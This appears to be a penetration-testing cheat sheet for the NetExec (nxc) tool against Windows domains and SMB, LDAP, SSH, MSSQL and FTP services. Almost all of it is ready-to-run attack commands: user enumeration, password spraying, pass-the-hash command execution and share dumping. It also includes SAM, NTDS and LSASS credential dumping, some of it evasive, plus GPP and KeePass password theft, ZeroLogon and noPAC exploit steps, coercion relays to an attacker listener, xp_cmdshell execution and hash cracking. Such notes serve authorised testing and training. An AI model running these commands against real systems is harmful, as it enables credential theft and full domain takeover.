NetExec
NetExec (nxc) is a network service exploitation tool that helps automate assessing the security of large networks. Check out its amazing and ever-evolving wiki page! You can view its usage in almost any of the AD-related boxes.
SMB
Enumeration
Enumerate domain/local users:
# List domain users
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --users
# List local users
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --users --local-auth
# Create a users list from nxc's output
$ nxc smb <target> -u <user> -p <pass> --users | awk '$1 == "SMB" && $5 != "[+]" && $5 != "-Username-" && $5 != "[*]" && $5 != "Guest" && $5 != "krbtgt" {print $5}' > domain_usersDomain users can be also be enumerated via a RID-bruteforcing attack:
# Brute-force RIDs (default up to 4000)
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --rid-brute <max-rid>
# Create a users list from nxc's output
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --rid-brute <max-rid> > nxc_users
cat nxc_users | awk '{print $6}' | awk -F'\' '{print $2}' > domain_usersEnumerate domain/local hosts:
# List domain hosts
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --computers
# List local hosts
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --computers --local-auth# List domain groups
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --groups --local-groups
# List local groups
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --local-groups # List active sessions
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --sessions
# List logged on users
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --loggedon-users# List the domain's password policy
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --pass-polPassword Spray
$ nxc smb <target> -u <user> -p <pass> -d <domain> --continue-on-successIf the results include the domain , e.g. (seruca.yzx) → a domain account.
...
SMB 192.168.X.97 445 DC01 [+] secura.yzx\bob:Pass123!If it has (Pw3d!) at the end → Local Administrator account.
...
SMB 192.168.X.95 445 SECURE [+] secura.yzx\bob:Pass123! (Pwn3d!)RCE
NetExec uses impacket-psexec to perform the Pass-the-Hash attack:
nxc smb <target> -u <user> --H <hash> -X <command>Spidering
# Only spider files, enable file content searching
nxc smb <ip> -u <user> -p <pass> --spider <share> --only-files --content
# Spider a specific directory
nxc smb <ip> -u <user> -p <pass> --spider <share> --spider-folder <folder>nxc smb <ip> -u <user> -p <pass> --spider <share> --pattern txtnxc smb <ip> -u <user> -p <pass> --spider <share> --content --regex Encryptnxc smb <ip> -u <user> -p <pass> --spider <share> --regex . --depth 1List and dump all files all readable shares:
nxc smb <ip> -u <user> -p <pass> -M spider_plus -o DOWNLOAD_FLAG=TrueUpload/Download
If large files are failing/erroring, add --smb-timeout with a value than 2.
nxc smb <ip> -u <user> -p <pass> --share <share> --get-file <\\path\\to\\file> <local-file>nxc smb <ip> -u <user> -p <pass> --share <share> --put-file <local-file> <\\path\\to\\upload\\file>Modules
# SAM
nxc smb <ip> -u <user> -p <pass> --sam
# NTDS
nxc smb <ip> -u <user> -p <pass> --ntds --user <user>
# LSA
nxc smb <ip> -u <user> -p <pass> --lsaThe hash format that starts with $DCC2$ (derived from --lsa) is stronger than NTLM and cannot be used for a PtH attack. For attempting to crack them, the domain and username needs to be removed; only the value starting with $DCC2$ is required.
# Convert DCC2 hashes
$ cat MS01_10.129.204.133_2022-11-08_093944.cached| cut -d ":" -f 2
$DCC2$10240#julio#c2139497f24725b345aa1e23352481f3
$DCC2$10240#david#a8338587a1c6ee53624372572e39b93f
$DCC2$10240#john#fbdeac2c1d121818f75796cedd0caf0a
# Crack hashes
hashcat -m2100 hashes.txt /usr/share/wordlists/rockyou.txtEnumerate network interfaces:
# Via WMI
nxc smb <ip> -u <user> -p <pass> -M get_netconnections
# Via RPC
nxc smb <ip> -u <user> -p <pass> -M ioxidresolverLocate the configuration file:
nxc smb <ip> -u <user> -p <pass> -M keepass_discoverCheck for credentials:
nxc smb <ip> -u <user> -p <pass> -M keepass_trigger -o ACTION=ALL KEEPASS_CONFIG_PATH=C:/Users/julio/AppData/Roaming/KeePass/KeePass.config.xml Check /tmp/export.xml after.
Retrieve the plaintext password for accounts pushed through GPPs:
nxc smb <ip> -u <user> -p <pass> -M gpp_passwordSearch for registry.xml files for autologin information:
nxc smb <ip> -u <user> -p <pass> -M gpp_autologinEnable RDP:
nxc smb <ip> -u <user> -p <pass> -M rdp -o ACTION=enablePython-based, uses impacket to read the LSASS dump and pypykatz to extract credentials:
nxc smb <ip> -u <user> -p <pass> -M lsassyUses the Sysinternals procdump to create the LSASS dump and pypykatz to extract credentials:
nxc smb <ip> -u <user> -p <pass> -M procdumpUses clone handles to create an obfuscated dump:
nxc smb <ip> -u <user> -p <pass> -M handlekatzOpening a handle to LSASS can be detected, so it searches for existing handles, and if one is found, it copies it and creates a LSASS minidump:
nxc smb <ip> -u <user> -p <pass> -M nanodumpVulnerabilities
The most critical vulnerabilities: from no creds/low privileges straight to DA !
Check for all at once:
$ nxc smb dc01 -u <user> -p <pass> -M zerologon -M nopac -M printnightmare -M smbghost -M ms17-010ZeroLogon (CVE-2020-1472) is a vulnerability in Microsoft’s Netlogon protocol that lets an attacker with network access spoof a DC, reset its password to blank, and gain full domain admin rights—without any credentials.
# Check for the vulnerability
nxc smb <dc-ip> -u '' -p '' -M zerologonThere is a PoC available:
# Exploit
./cve-2020-1472-exploit.py <DC-netBIOS-name> <dc-ip>
# Dump the administrator's hash
$ impacket-secretsdump -just-dc -no-pass <DC-netBIOS-name>\$@<dc-ip> -just-dc-user administrator
# Restore password
./restorepassword.py <DC-netBIOS-name>@<DC-IP> -target-ip <DC-IP> -hexpass <plaintext-machine-password>noPAC is a vulnerability that lets an attacker with low-privileged domain access abuse misconfigured delegation and Kerberos to impersonate DCs and gain Domain Admin rights by forging a Privileged Attribute Certificate (PAC).
# Check for the vulnerability
$ nxc smb dc01 -u <user> -p <pass> -M nopacThere is a PoC available:
# Get the ST
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203
# Get RCE
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator
# Dump hash
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgtPrintNightmare is a critical Windows Print Spooler vulnerability that allows an attacker with network or local access to execute code as SYSTEM on a DC or any Windows machine, enabling full takeover of the system and often the entire domain.
# Check for the vulnerability
nxc smb <ip> -u '' -p '' -M printnightmareSMBGhost (CVE-2020-0796) is a critical vulnerability in the SMBv3 protocol that lets an attacker remotely execute code on vulnerable Windows systems by sending specially crafted packets, allowing full control without authentication. It targets any SMBv3-enabled host on the network, including DCs.
# Check for the vulnerability
nxc smb <ip> -u '' -p '' -M smbghostMS17-010 is a critical Windows SMB vulnerability, aka EternalBlue, that allows remote attackers to execute code on vulnerable systems without authentication by exploiting flaws in SMBv1. It targets any SMBv1-enabled Windows host, including DCs, enabling full system takeover.
# Check for the vulnerability
nxc smb <ip> -u '' -p '' -M ms17-010Checks for coerce vulnerabilities. By default the LISTENER ip will be set to localhost, so no traffic will appear on the network.
The coerce_plus module includes:
PetitPotam: Coerces a DC to authenticate to an attacker via
MS-EFSRPC, enabling NTLM relay attacks for domain takeover.DFSCoerce: Tricks a DC into authenticating to the attacker via the Distributed File System service, enabling relay attacks.
PrinterBug: Exploits Windows Print Spooler to coerce authentication and enable NTLM relay attacks.
MSEven: Uses the Microsoft Exchange’s Web Services to force authentication, facilitating NTLM relay and privilege escalation.
ShadowCoerce: Coerces a domain host to authenticate by abusing the Shadow Copy service, enabling relay attacks.
# Check for the vulnerabilities
$ nxc smb dc01 -u <user> -p <pass> -M coerce_plusIf one or more are found, set the listener:
# Run all exploit methods at once
nxc smb <ip> -u '' -p '' -M coerce_plus -o LISTENER=<attacker-ip> ALWAYS=true
# Run a specific method
$ nxc smb dc01 -u <user> -p <pass> -M coerce_plus -o M=DFSCoerce L=<attacker-ip> ALWAYS=trueLDAP
Enumerate the description field of domain users (get-desc-users):
# Enumerate all users
nxc ldap DC01 -u '' -p '' -M get-desc-users
# Filter for a target string
nxc ldap DC01 -u '' -p '' -M get-desc-users -o FILTER='string'
# Look for passwords
nxc ldap DC01 -u '' -p '' -M get-desc-users -o PASSWORDPOLICY=True MINLENGTH=8Execute the whoami command for any domain user:
nxc ldap dc01 -u x7331 -p Pass123! -M whoami -o USER=x1337Obtain the domain's SID:
nxc ldap DC01 -u x7331 -p Pass123! --get-sidnxc ldap dc01.rebound.htb -u <user> -p <pass> -k --gmsanxc ldap <target> -u <user> -p <pass> -M get-network -o ALL=truenxc ldap <ip> -u <user> -p <pass> -M lapsnxc ldap <ip> -u <user> -p <pass> -M daclread -o TARGET=<user> ACTION=read
# DCSync rights
nxc ldap <ip> -u <user> -p <pass> -M daclread -o TARGET_DN="DC=inlanefreight,DC=htb" ACTION=read RIGHTS=DCSyncSSH
# Password authentication
nxc ssh <target> -u <user> -p <pass>
# Key authentication
nxc ssh <target> -u <user> -p '' --key-file root_id_rsa
# Port specification
nxc ssh <target> -u <user> -p <pass> --port 2222nxc ssh <target> -u userfile -p passwordfile --no-bruteforce --continue-on-successnxc ssh <target> -u <user> -p <pass> -x <command># Upload
nxc ssh <target> -u <user> -p <pass> --put-file file.txt /tmp/file.txt
# Download
nxc ssh <target> -u <user> -p <pass> --get-file /tmp/file.txt file.txtMSSQL
Two methods can be used to authenticate to MSSQL: Windows (default) & local auth:
# 1. Windows auth
# With SMB port open
nxc mssql <target> -u <user> -p <pass>
# With SMB port closed
nxc mssql <target> -u <user> -p <pass> -d <domain>
# 2. Local auth
nxc mssql <target> -u <user> -p <pass> --local-authPorts can be also be specified:
nxc mssql <target> -u <user> -p <pass> --port <port>nxc mssql <target> -u userfile -p passwordfile --no-bruteforce --continue-on-successFrom standard user to DBA:
# Check if possible
nxc mssql <ip> -u user -p password -M mssql_priv
# Impersonate
nxc mssql <ip> -u user -p password -M mssql_priv -o ACTION=privesc
# Rollback
nxc mssql <ip> -u user -p password -M mssql_priv -o ACTION=rollback# Remote queries
nxc mssql <target> -u <user> -p <pass> --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
# System RCE via xp_cmdshell
nxc mssql <target> -u <user> -p <pass> --local-auth -x whoami# Upload
nxc mssql <target> -u <user> -p <pass> --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt
# Download
nxc mssql <target> -u <user> -p <pass> --get-file C:\\Windows\\Temp\\whoami.txt /tmp/fileFTP
nxc ftp <target> -u userfile -p passwordfile --no-bruteforce --continue-on-success# List root directory
nxc ftp <target> -u <user> -p <pass> --ls
# List a specific directory
nxc ftp <target> -u <user> -p <pass> --ls <dir># Download
nxc ftp <target> -u <user> -p <pass> --get <file>
# Upload
nxc ftp <target> -u <user> -p <pass> --put <local-file> <remote-file>Resources
Last updated
Was this helpful?